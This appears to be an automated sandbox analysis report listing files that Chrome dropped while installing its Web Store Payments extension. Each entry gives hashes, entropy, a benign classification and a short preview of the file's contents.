Preview:	{"craw_app_unavailable":{"message":"Appen \u00e4r inte tillg\u00e4nglig f\u00f6r tillf\u00e4llet."},"craw_connect_to_network":{"message":"Anslut till ett n\u00e4tverk."},"app_name":{"message":"Betalning via Chrome Web Store"},"app_description":{"message":"Betalning via Chrome Web Store"},"iap_unavailable":{"message":"Betalning i appen \u00e4r inte tillg\u00e4ngligt f\u00f6r n\u00e4rvarande."},"please_sign_in":{"message":"Logga in i Chrome."},"jwt_retrieve_failed":{"message":"The transaction could not be completed."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir4872_1835717667\CRX_INSTALL\_locales\th\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines
Category:	dropped
Size (bytes):	1300
Entropy (8bit):	4.09652661599029
Encrypted:	false
SSDEEP:
MD5:	283D5177FB2FC7082967988E2683EC7C
SHA1:	DEDE43967F3CEF9D9325F140872A63BFCE2AA8C5
SHA-256:	E8D5820BDE31B66A7641068FDEDD1A5F20C1A783460B98887A670F38422099CF
SHA-512:	74413C00C58B7136038D4C41D5C7C79EC02A9830779ABB719D72536B74C5E338B1548A20290559FB3F4E2A938B728CF99041050DD1970848EE9A6590EB0AB3E4
Malicious:	false
Reputation:	unknown
Preview:	{"craw_app_unavailable":{"message":"\u0e44\u0e21\u0e48\u0e2a\u0e32\u0e21\u0e32\u0e23\u0e16\u0e43\u0e0a\u0e49\u0e07\u0e32\u0e19\u0e41\u0e2d\u0e1b\u0e44\u0e14\u0e49\u0e43\u0e19\u0e02\u0e13\u0e30\u0e19\u0e35\u0e49"},"craw_connect_to_network":{"message":"\u0e42\u0e1b\u0e23\u0e14\u0e40\u0e0a\u0e37\u0e48\u0e2d\u0e21\u0e15\u0e48\u0e2d\u0e01\u0e31\u0e1a\u0e40\u0e04\u0e23\u0e37\u0e2d\u0e02\u0e48\u0e32\u0e22"},"app_name":{"message":"\u0e23\u0e30\u0e1a\u0e1a\u0e0a\u0e33\u0e23\u0e30\u0e40\u0e07\u0e34\u0e19\u0e02\u0e2d\u0e07 Chrome \u0e40\u0e27\u0e47\u0e1a\u0e2a\u0e42\u0e15\u0e23\u0e4c"},"app_description":{"message":"\u0e23\u0e30\u0e1a\u0e1a\u0e0a\u0e33\u0e23\u0e30\u0e40\u0e07\u0e34\u0e19\u0e02\u0e2d\u0e07 Chrome \u0e40\u0e27\u0e47\u0e1a\u0e2a\u0e42\u0e15\u0e23\u0e4c"},"iap_unavailable":{"message":"\u0e23\u0e30\u0e1a\u0e1a\u0e0a\u0e33\u0e23\u0e30\u0e40\u0e07\u0e34\u0e19\u0e43\u0e19\u0e41\u0e2d\u0e1b\u0e1e\u0e25\u0e34\u0e40\u0e04\u0e0a\u0e31\u0e19\u0e44\u0e21\u0e48\u0e1e\u0e23\u0e49\u0e2d\u0e21\u0e4

C:\Users\user\AppData\Local\Temp\scoped_dir4872_1835717667\CRX_INSTALL\_locales\tr\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines
Category:	dropped
Size (bytes):	572
Entropy (8bit):	4.93347615778905
Encrypted:	false
SSDEEP:
MD5:	1BF2AA4BB904B406C9C2B7DF769BB540
SHA1:	8D29C4B7A79AB0657747CA194D1934292A46D2A8
SHA-256:	0F2E8285BA3E2BDBA6B16435FB941B07159AACFAC80196AD5941B79AB52B712A
SHA-512:	0DF48AE0A518A940489E91D8A0D6E7E47A3153747358E06CD792BFA3D826F47FA1502268F602E7D7EDFC1C111AEB3FAF0E67F845986DDA77E2FC4B3336BCF46C
Malicious:	false
Reputation:	unknown
Preview:	{"craw_app_unavailable":{"message":"Uygulama \u015fu anda kullan\u0131lam\u0131yor."},"craw_connect_to_network":{"message":"L\u00fctfen bir a\u011fa ba\u011flan\u0131n."},"app_name":{"message":"Chrome Web Ma\u011fazas\u0131 \u00d6demeleri"},"app_description":{"message":"Chrome Web Ma\u011fazas\u0131 \u00d6demeleri"},"iap_unavailable":{"message":"Uygulama \u0130\u00e7i \u00d6demeler \u015fu anda kullan\u0131lamaz."},"please_sign_in":{"message":"L\u00fctfen Chrome'da oturum a\u00e7\u0131n."},"jwt_retrieve_failed":{"message":"The transaction could not be completed."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir4872_1835717667\CRX_INSTALL\_locales\uk\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines
Category:	dropped
Size (bytes):	1088
Entropy (8bit):	4.268588181103308
Encrypted:	false
SSDEEP:
MD5:	FD1C9890679036E1AD914218753B1E8E
SHA1:	58160F7A0FC94110A2876223E406A517C8E2660B
SHA-256:	39D19CC3387FFCE13A8F11DAD72E2FCBB7CD1A4367EC699AD7C40D6F52ECE717
SHA-512:	03E81C398EE6A5DC65A40CA07E1A4CBEC2662D2C151A76C9ECB813587D672AC71311C39C5C5DA8A1AE78A3A6CE3938609D1365F7819424FC34289C7743DF00D2
Malicious:	false
Reputation:	unknown
Preview:	{"craw_app_unavailable":{"message":"\u041f\u0440\u043e\u0433\u0440\u0430\u043c\u0430 \u0442\u0438\u043c\u0447\u0430\u0441\u043e\u0432\u043e \u043d\u0435\u0434\u043e\u0441\u0442\u0443\u043f\u043d\u0430."},"craw_connect_to_network":{"message":"\u041f\u0456\u0434\u2019\u0454\u0434\u043d\u0430\u0439\u0442\u0435\u0441\u044f \u0434\u043e \u043c\u0435\u0440\u0435\u0436\u0456."},"app_name":{"message":"\u041f\u043b\u0430\u0442\u0435\u0436\u0456 \u0412\u0435\u0431-\u043c\u0430\u0433\u0430\u0437\u0438\u043d\u0443 Chrome"},"app_description":{"message":"\u041f\u043b\u0430\u0442\u0435\u0436\u0456 \u0412\u0435\u0431-\u043c\u0430\u0433\u0430\u0437\u0438\u043d\u0443 Chrome"},"iap_unavailable":{"message":"\u041f\u043b\u0430\u0442\u0435\u0436\u0456 \u0447\u0435\u0440\u0435\u0437 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u0443 \u0437\u0430\u0440\u0430\u0437 \u043d\u0435 \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u0456."},"please_sign_in":{"message":"\u0423\u0432\u0456\u0439\u0434\u0456\u0442\u044c \u0443

C:\Users\user\AppData\Local\Temp\scoped_dir4872_1835717667\CRX_INSTALL\_locales\vi\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines
Category:	dropped
Size (bytes):	671
Entropy (8bit):	4.846531831162704
Encrypted:	false
SSDEEP:
MD5:	7D52E9357AB847B4CC8DBC8CC4DA93F5
SHA1:	AF877F3992D8056C8F08462BD575595BF79FE5B0
SHA-256:	313F71F3FFDCEFC76FC746FF2029FBF8FBE38BD83DCF952FC3DDCD8AA96D5CFB
SHA-512:	E66E7FACDF35A0F72AC61DEAAEC43A2DAC976CADEA146EBE3E90E739178F173E32ADCF909F05F2657F2AD66E2ECB6015F6733CEA4B9E42337246469F89D3A12F
Malicious:	false
Reputation:	unknown
Preview:	{"craw_app_unavailable":{"message":"\u1ee8ng d\u1ee5ng hi\u1ec7n kh\u00f4ng kh\u1ea3 d\u1ee5ng."},"craw_connect_to_network":{"message":"Vui l\u00f2ng k\u1ebft n\u1ed1i v\u1edbi m\u1ea1ng."},"app_name":{"message":"Thanh to\u00e1n tr\u00ean c\u1eeda h\u00e0ng Chrome tr\u1ef1c tuy\u1ebfn"},"app_description":{"message":"Thanh to\u00e1n tr\u00ean c\u1eeda h\u00e0ng Chrome tr\u1ef1c tuy\u1ebfn"},"iap_unavailable":{"message":"Thanh to\u00e1n trong \u1ee9ng d\u1ee5ng hi\u1ec7n kh\u00f4ng kh\u1ea3 d\u1ee5ng."},"please_sign_in":{"message":"Vui l\u00f2ng \u0111\u0103ng nh\u1eadp v\u00e0o Chrome."},"jwt_retrieve_failed":{"message":"The transaction could not be completed."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir4872_1835717667\CRX_INSTALL\_locales\zh_CN\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines
Category:	dropped
Size (bytes):	602
Entropy (8bit):	4.917339139635893
Encrypted:	false
SSDEEP:
MD5:	393680A09DEE0CB9046A62BDC0750B74
SHA1:	54E7F8215061A4AB241B87AE4E81C8F860EB2C2B
SHA-256:	D5FB52C2897FD5C294784DB63C933AC77C609D10AC91431CCB295D87452CBEE6
SHA-512:	14C214CAEFC69B085E918F492C75E2A48BC6A9C2D347D29403B26E69A474825E302A3E106710E5C04E047BD57EE684A67846A5DE956705FFBF41BB0614B8CEB2
Malicious:	false
Reputation:	unknown
Preview:	{"craw_app_unavailable":{"message":"\u5e94\u7528\u76ee\u524d\u65e0\u6cd5\u4f7f\u7528\u3002"},"craw_connect_to_network":{"message":"\u8bf7\u8fde\u63a5\u5230\u7f51\u7edc\u3002"},"app_name":{"message":"Chrome \u7f51\u4e0a\u5e94\u7528\u5e97\u4ed8\u6b3e\u7cfb\u7edf"},"app_description":{"message":"Chrome \u7f51\u4e0a\u5e94\u7528\u5e97\u4ed8\u6b3e\u7cfb\u7edf"},"iap_unavailable":{"message":"\u76ee\u524d\u65e0\u6cd5\u4f7f\u7528\u5e94\u7528\u5185\u4ed8\u6b3e\u3002"},"please_sign_in":{"message":"\u8bf7\u767b\u5f55 Chrome\u3002"},"jwt_retrieve_failed":{"message":"The transaction could not be completed."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir4872_1835717667\CRX_INSTALL\_locales\zh_TW\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines
Category:	dropped
Size (bytes):	680
Entropy (8bit):	4.916281462386558
Encrypted:	false
SSDEEP:
MD5:	CD30D132A7213FC1B7E03C6D0A49CCF7
SHA1:	1141DED39023B821FE9BB4682E0D1EB5469DAF76
SHA-256:	5717F13D10E63255947F750C79CBB6BD04A6D97A08261E8D5764AF5EB0561A28
SHA-512:	0DCD3CEB93AB58655551B00D7AD4FE4A6F1F6B24EDD31244FF9B57AE529BF1A9E0220A6258C64790F9CC9F026AB9DA3AEE1575809CC94DC4F8754194C958FD19
Malicious:	false
Reputation:	unknown
Preview:	{"craw_app_unavailable":{"message":"\u76ee\u524d\u7121\u6cd5\u4f7f\u7528\u9019\u500b\u61c9\u7528\u7a0b\u5f0f\u3002"},"craw_connect_to_network":{"message":"\u8acb\u9023\u4e0a\u7db2\u8def\u3002"},"app_name":{"message":"Chrome \u7dda\u4e0a\u61c9\u7528\u7a0b\u5f0f\u5546\u5e97\u4ed8\u6b3e\u7cfb\u7d71"},"app_description":{"message":"Chrome \u7dda\u4e0a\u61c9\u7528\u7a0b\u5f0f\u5546\u5e97\u4ed8\u6b3e\u7cfb\u7d71"},"iap_unavailable":{"message":"\u76ee\u524d\u7121\u6cd5\u4f7f\u7528\u61c9\u7528\u7a0b\u5f0f\u5167\u4ed8\u6b3e\u529f\u80fd\u3002"},"please_sign_in":{"message":"\u8acb\u767b\u5165 Chrome\u3002"},"jwt_retrieve_failed":{"message":"The transaction could not be completed."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir4872_1835717667\CRX_INSTALL\_metadata\verified_contents.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	7780
Entropy (8bit):	5.791315351651491
Encrypted:	false
SSDEEP:
MD5:	0834821960CB5C6E9D477AEF649CB2E4
SHA1:	7D25F027D7CEE9E94E9CBDEE1F9220C8D20A1588
SHA-256:	52A24FA2FB3BCB18D9D8571AE385C4A830FF98CE4C18384D40A84EA7F6BA7F69
SHA-512:	9AEAFC3ECE295678242D81D71804E370900A6D4C6A618C5A81CACD869B84346FEAC92189E01718A7BB5C8226E9BE88B063D2ECE7CB0C84F17BB1AF3C5B1A3FC4
Malicious:	false
Reputation:	unknown
Preview:	[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiJfbG9jYWxlcy9iZy9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiZHUtdGRPdUNWcmxDY254Q0poRkg2NXpLU05vb1RiUE56bDNHbzdRMGJ3SSJ9LHsicGF0aCI6Il9sb2NhbGVzL2NhL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJ6ZGtWaF9XdkxJWlhkck5xWHBvSHNRMGh1ZGtSM2d1QlMzb2VsTEZLNklVIn0seyJwYXRoIjoiX2xvY2FsZXMvY3MvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6Ik9nUkNIZlVoam9xOU93NHFfaEhvTTQxNzNMelJyYkVpUVdsRXNRSzhscFkifSx7InBhdGgiOiJfbG9jYWxlcy9kYS9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiN2JVWW1LYkhQUUNRMXBGcmUzTHJySEhwWk9xN1c2Zk5hT0laWmdKUERTTSJ9LHsicGF0aCI6Il9sb2NhbGVzL2RlL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJOV3FkU3Rfc1NFMm9KT2VuSUZtM0pMRm9iOGtBZ3ZTa3RtZGpCRGJWazdBIn0seyJwYXRoIjoiX2xvY2FsZXMvZWwvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6ImgyaEZ0YUJoLXJQUEtoUm00QkFWM0VEZmhFbnh5MElGOVhYT3Z0aHhlNjAifSx7InBhdGgiOiJfbG9jYWxlcy9lbi9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoid0pSZDFmM3NxMERFVTJHLXd

C:\Users\user\AppData\Local\Temp\scoped_dir4872_1835717667\CRX_INSTALL\craw_background.js

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines
Category:	dropped
Size (bytes):	544643
Entropy (8bit):	5.385396177420207
Encrypted:	false
SSDEEP:
MD5:	6EEBED29E6A6301E92A9B8B347807F5F
SHA1:	65DFB69B650560551110B33DCBA50B25E5B876DE
SHA-256:	04CD9494B0ED83924DAD12202630B20D053D9E2819C8E826A386C814CC0A1697
SHA-512:	FEDE6DB31F2AD242E7BC7B52A8859BA7F466A0B920A8DADCB32DCFB5B2A2742E98B767FF22E0C5BC5C11FEC021240AA9E458486C9039EB4EBE5CF6AF7BE97BF2
Malicious:	false
Reputation:	unknown
Preview:	/.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0./.var d,e=e\|\|{};e.scope={};e.arrayIteratorImpl=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};e.arrayIterator=function(a){return{next:e.arrayIteratorImpl(a)}};e.ASSUME_ES5=!1;e.ASSUME_NO_NATIVE_MAP=!1;e.ASSUME_NO_NATIVE_SET=!1;e.SIMPLE_FROUND_POLYFILL=!1;e.ISOLATE_POLYFILLS=!1;e.FORCE_POLYFILL_PROMISE=!1;e.FORCE_POLYFILL_PROMISE_WHEN_NO_UNHANDLED_REJECTION=!1;.e.defineProperty=e.ASSUME_ES5\|\|"function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;return a};e.getGlobal=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");};e.global=e.getGlobal(this);.e.IS_SYMBOL_NATIVE="func

C:\Users\user\AppData\Local\Temp\scoped_dir4872_1835717667\CRX_INSTALL\craw_window.js

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines
Category:	dropped
Size (bytes):	261316
Entropy (8bit):	5.444466092380538
Encrypted:	false
SSDEEP:
MD5:	1709B6F00A136241185161AA3DF46A06
SHA1:	33DA7D262FFED1A5C2D85B7390E9DBC830CBE494
SHA-256:	5721A4B3F8E09C869A629EFFD350B51C9D46F0AC136717D4DB6265C0EE6F9AC8
SHA-512:	26835B4C050F53AD2DDB84469DF9A84BBB2786A655AB52DFC20B54BEDCB81D1ECD789198D5B7D8B940242E5CEAC818A177444D402397AE82C203438C4B1D19CB
Malicious:	false
Reputation:	unknown
Preview:	/.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0./.var b,k=k\|\|{};k.scope={};k.createTemplateTagFirstArg=function(a){return a.raw=a};k.createTemplateTagFirstArgWithRaw=function(a,c){a.raw=c;return a};k.arrayIteratorImpl=function(a){var c=0;return function(){return c<a.length?{done:!1,value:a[c++]}:{done:!0}}};k.arrayIterator=function(a){return{next:k.arrayIteratorImpl(a)}};k.makeIterator=function(a){var c="undefined"!=typeof Symbol&&Symbol.iterator&&a[Symbol.iterator];return c?c.call(a):k.arrayIterator(a)};.k.arrayFromIterator=function(a){for(var c,d=[];!(c=a.next()).done;)d.push(c.value);return d};k.arrayFromIterable=function(a){return a instanceof Array?a:k.arrayFromIterator(k.makeIterator(a))};k.ASSUME_ES5=!1;k.ASSUME_NO_NATIVE_MAP=!1;k.ASSUME_NO_NATIVE_SET=!1;k.SIMPLE_FROUND_POLYFILL=!1;k.ISOLATE_POLYFILLS=!1;k.FORCE_POLYFILL_PROMISE=!1;k.FORCE_POLYFILL_PROMISE_WHEN_NO_UNHANDLED_REJECTION=!1;.k.objectCreate=k.ASSUME_ES5\|\|"function"==typeof Object.cre

C:\Users\user\AppData\Local\Temp\scoped_dir4872_1835717667\CRX_INSTALL\css\craw_window.css

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	1741
Entropy (8bit):	4.912380256743454
Encrypted:	false
SSDEEP:
MD5:	67BF9AABE17541852F9DDFF8245096CD
SHA1:	A4AC74DD258E8E0689034FAA1B15A5C7C56DC3BB
SHA-256:	10DFBD2D98950B79EE12F6B8E3885AABE31543048DE56AD4FC0A5E34D0D9D4EC
SHA-512:	298FA132C6F122798FDB9BC6DE8024915147ADC20355B56A92F0ED9ACCE4549BE6E7F42212E07DCA166E31624D4E66E299565845D4BA1C51CA935050641B61FE
Malicious:	false
Reputation:	unknown
Preview:	html, body {. margin: 0;. overflow: hidden;.}..webview {. width: 100%;. height: 100%;. min-height: 100%;. position: absolute;.}...craw_overlay {. position: absolute;.. left: 0;. top: 0;. right: 0;. bottom: 0;.. background-color: white;.. -webkit-transition: opacity 250ms linear;.. display: -webkit-flex;. -webkit-flex-direction: column;. -webkit-flex: 1 0%;. -webkit-align-items: center;. -webkit-justify-content: center;.. -webkit-app-region: drag;.}...craw_overlay img {. margin: 16px;.}..#loading_overlay {. opacity: 1;.}..#offline_overlay {. opacity: 0;. display: none;.}..#offline_overlay > img {. -webkit-filter: saturate(0%);.}..#offline_overlay > span {. font-family: 'Open Sans', 'Deja Vu Sans', Arial, sans-serif;. font-size: 15px;. line-height: 21px;. color: #8d8d8d;. display: block;.}..#loading_splash {. width: 128px;. height: 128px;.}..#drag_overlay {. position: absolute;. left: 0;. top: 0;. right: 0;. bottom: 0;. pointer-events: none;. -webkit

C:\Users\user\AppData\Local\Temp\scoped_dir4872_1835717667\CRX_INSTALL\html\craw_window.html

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text
Category:	dropped
Size (bytes):	810
Entropy (8bit):	4.723481385335562
Encrypted:	false
SSDEEP:
MD5:	34A839BC40DEBC746BBD181D9EF9310C
SHA1:	8B4EAA74D31EED5B0BABA3CA5460201F6B10DA46
SHA-256:	BB8742615E4CD996AE5D0200E443AE6A6F0B473255F03AFFDB8FB4660DE4554D
SHA-512:	EE81E5509CBC2CB2B6C834224688C1E1B1AA9AA3866C52F8EAED040D5C390653C52D8D681E2E2CF62906643962ABAC823D5B622385B983B21E0DCCAFDF281EFF
Malicious:	false
Reputation:	unknown
Preview:	<!DOCTYPE html>.<html>. <head>. <link href="/css/craw_window.css" rel="stylesheet">. <script src="/craw_window.js"></script>. </head>. <body>. <webview></webview>. <div class="craw_overlay" id="loading_overlay">. <img src="/images/icon_128.png" />. <img src="/images/flapper.gif" />. </div>. <div class="craw_overlay" id="offline_overlay">. <img src="/images/icon_128.png" />. <span id="app_unavailable"></span>. <span id="connect_to_network"></span>. </div>. <div id="drag_overlay"></div>. <div id="top_bar">. <div id='close_button'>. <img src='/images/topbar_floating_button_close.png'/>. </div>. <div id='maximize_button'>. <img src='/images/topbar_floating_button_maximize.png'/>. </div>. </div>. </body>.</html>.

C:\Users\user\AppData\Local\Temp\scoped_dir4872_1835717667\CRX_INSTALL\images\flapper.gif

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	GIF image data, version 89a, 30 x 30
Category:	dropped
Size (bytes):	70364
Entropy (8bit):	7.119902236613185
Encrypted:	false
SSDEEP:
MD5:	398ABB308EEBC355DA70BCE907B22E29
SHA1:	CFFB77B8A1724B8F81D98C6D6AD0071D10162252
SHA-256:	2B73533F47A99FFEA9CC405FFAFA9C4C53623F62487AEBFBA415945120B22040
SHA-512:	FC7A56FC8A61A582161874B54ADBAD30A84840190008EDB0B6FBF84F91393CA58E988E3FE446F11A0C3C691C18249B93AEC2904B3D0C4F0857D79034F662385A
Malicious:	false
Reputation:	unknown
Preview:	GIF89a.......................................................!.......!..NETSCAPE2.0.....,.............9.:.h0.bT(6.!l.&..("gk..JL1.[....o. .(:..B(.6."...Z.CUyh0.....j.C.z8..S....2.T'...Q..4 g\|]$ueW.NyQ.IoL!AoF#9h>7.0t..%..,.@.m4..7..!.......,.............9.:.h0.bT(6.!l.&..("gk..JL1.[....o. .(:..B(.6."...Z.CUyh0.....j.C.z8..S....2.T'...Q..4 g\|]$ueW.NyQ.IoL!AoF#9h>7.0t..%..,.@.m4..7..!.......,............................................................................................................'..w=.....\.)._6.k..OF...n.#\~"....2b3..I.)..eu.Q.`.e......gr.?>.s.I0.....@.~.Tr.[8.+.,.;..EE....S.*f.....,.....B8/D..;.9.q......ukC...r.I.....j......BGY...o2J....+O4....X4.....cH%7....I.....0H!.!.....!.,.............................................................................................................................................................................................................p8.a$....hh@.4....X,A.0L..(....JX.j...,..........z.X.Q....jB.d....B..

C:\Users\user\AppData\Local\Temp\scoped_dir4872_1835717667\CRX_INSTALL\images\icon_128.png

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	4364
Entropy (8bit):	7.915848007375225
Encrypted:	false
SSDEEP:
MD5:	4DBC9F9E6F5A08D299BAC9E54DF07694
SHA1:	BB38F5DE34B1E0BE1109220BA55271087A4D9EA5
SHA-256:	91C2718DD23B4356D71F88F6146868369033291086DF327534546DFA459BEB0E
SHA-512:	A5F2B1F47502836130D8083F757B7773C1E1CB36B76AD298CC29AB2B428C8002D2F15BD839838FC326DAC3681C2F48AB25A3E7631D33726C4B25E8EC14170912
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR..............>a.....IDATx..yp.....gF#.:,[H.l.l..8...`/.k....,!a7Km...E...Te..T.....J...p....%.(....+...3....eY.e...L.o...5....h4...\....{?....~.u.`0.....`0.....`0.....`.Y......[(.......).4....ai..w38.+....Bf././..]...{......8...3.....3W~OJ.. /...u6V.C..U.0.+._=.c..9.X.?....L....S@.L...m.0..>.C...L\|TF.p5..f4M.,.V....8..a.<...RP..@)E,..E"...h.....!...-....,I..T..........m..._[[{w{{....{.^......M.x..h4.h.....\.R.E....j).7.....h4.A.E....,. ...iii.Vj?2...=/.B.FK9P..@)=Rj..D".Y...2.B..x.}0...&J...2.......f.O..e.H.....!.J)'I..R....B............QJ;K..L...L.l".L~mhh.R.@).FFF~.L&...~.B.......u.........}.....~.....f..yUU...........^M...6......].,w.e..~.!$.C.R.....E(%e9.,....k..@...W8.........@...........O..@%.~..@.S..P.....`Tp...."...?ME..c......s...`..S1...7.b..aNE..k...3.yP.}.Ch.}......B..........IPE..C.<....T....k......Z..o_......g........P..A=y.J.)h..@.q.-.].AU.4...F.M.....y%B]+ .\.~..9......:..=...r.....E].o...F..P........i...\|....

C:\Users\user\AppData\Local\Temp\scoped_dir4872_1835717667\CRX_INSTALL\images\icon_16.png

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	558
Entropy (8bit):	7.505638146035601
Encrypted:	false
SSDEEP:
MD5:	FB9C46EA81AD3E456D90D58697C12C06
SHA1:	5FC450F7D73CCFAC8F0D818CB3392BA4D91B69DE
SHA-256:	016CA659BA080E194FBFC0929602B16506ED60AA6019FAA51410C4FD93B583E8
SHA-512:	ADD810EE9EB7CAEC505B5FD90A1F184CE39D8F8C689DCC240F188FE353B9575489492E07D572A3B1C11A1555CE66AFCA5134903E4C1AA3D54BC7C5ED3E65B50C
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR................a....IDAT8...Mk.Q...;... .....F..QW.....F....J.?.w..7~......'.Q..B]... .QS...M&_w..b&.\|`......p...f.?.D$.y^..........y...\..Z..t6..oRj.@&.u..G.qN).t.-V.>(.N.Ep]wFk.60o.]0.`Y..cT..Y.Tb.`DF.d..s.Z..E..9.4._C.._...%..*.^....4.l...Y..X..R..../...Wj+w0[.].._B.k.${.\.>.%...........lz .w.ALxo.2;..a...".p..S..&..uXS...<..6..[..zD.._.N+w.WbM7ye6X<...'(,=.r}........$f..5..P....k..."..8.s.<zgSm@.....).Y.....:e..\|.....F...I..A$.....T?.....m....8.........N...z.....V..vd.h'....C.?.....H.;]..C.M.....9.b......IEND.B`.

C:\Users\user\AppData\Local\Temp\scoped_dir4872_1835717667\CRX_INSTALL\images\topbar_floating_button.png

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	160
Entropy (8bit):	5.475799237015411
Encrypted:	false
SSDEEP:
MD5:	8803665A6328D23CC1014A7B0E9BE295
SHA1:	9DA6EE729D5A6E9F30658B8EC954710F107A641F
SHA-256:	D5F9234DC36E7FFA85F35B2359A4F82276F8395EFA76E4553507EA990B27FC6C
SHA-512:	ECD9E71B8BA1ED8BD4CA5A0936CB66A83611C4ABCBDA76C250F4CDF4AD80320212E8F5EEB79A38910718F8346ECC1AD580A3FA835EC2B22BE497F36899FB5930
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<...BIDATx...Q..0......2...(p...~Z.}'.>I%O...V!s..................../...`.<..`.....IEND.B`.

C:\Users\user\AppData\Local\Temp\scoped_dir4872_1835717667\CRX_INSTALL\images\topbar_floating_button_close.png

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	252
Entropy (8bit):	6.512071394066515
Encrypted:	false
SSDEEP:
MD5:	0599DFD9107C7647F27E69331B0A7D75
SHA1:	3198C0A5F34DB67F91A0035DBC297354CBC95525
SHA-256:	131817CD9311C03DF22D769DD2AD7FA2E6E9558863A89F7E5E1657424031A937
SHA-512:	0076ACB9D6A886BD987876E49495038F9388B292A9EFE5C9093CCA64CA3692E3A5D24E35172C7697F6AAE34B86CA217EE59C003423E46D9499BD27EC7D77A649
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx...... ..Pp.X....H...b@...\|.^LC_.E.BP+......X.P..........q..~..p/. ..s.....%D^...$......@.!...<...).?.4{.k.G3...4..[cH..0..l.8.!r..m.R..{..........`.f...#.x.....IEND.B`.

C:\Users\user\AppData\Local\Temp\scoped_dir4872_1835717667\CRX_INSTALL\images\topbar_floating_button_hover.png

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	160
Entropy (8bit):	5.423186859407619
Encrypted:	false
SSDEEP:
MD5:	7CB6B9DC1A30F63B8BD976924B75AD96
SHA1:	0C40B0C496D2F2B5F2021C117EC8610AC03AB469
SHA-256:	721B7AAA9A42A54A349881615A12E3A26983ACA48E173FD2F66E66AA0D725735
SHA-512:	4764937364E355956B242B84010AC56102536D2AACBE4227F0E88E4DE7AB468571957EA6C33012539156E5349AE4F777115615AE3361F60ADDF9CD227424F76A
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<...BIDATx...A..0...+B.z.s...*.....$.<u..[...................h.......C.CA).....IEND.B`.

C:\Users\user\AppData\Local\Temp\scoped_dir4872_1835717667\CRX_INSTALL\images\topbar_floating_button_maximize.png

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	166
Entropy (8bit):	5.8155898293424775
Encrypted:	false
SSDEEP:
MD5:	232CE72808B60CBE0F4FA788A76523DF
SHA1:	721A9C98C835D2CD734153BBE07833C6637ECD68
SHA-256:	AFA4EA944CBDEC8543242E627EF46D5BFD3766DCAC664E7E50CDEEF2B352740C
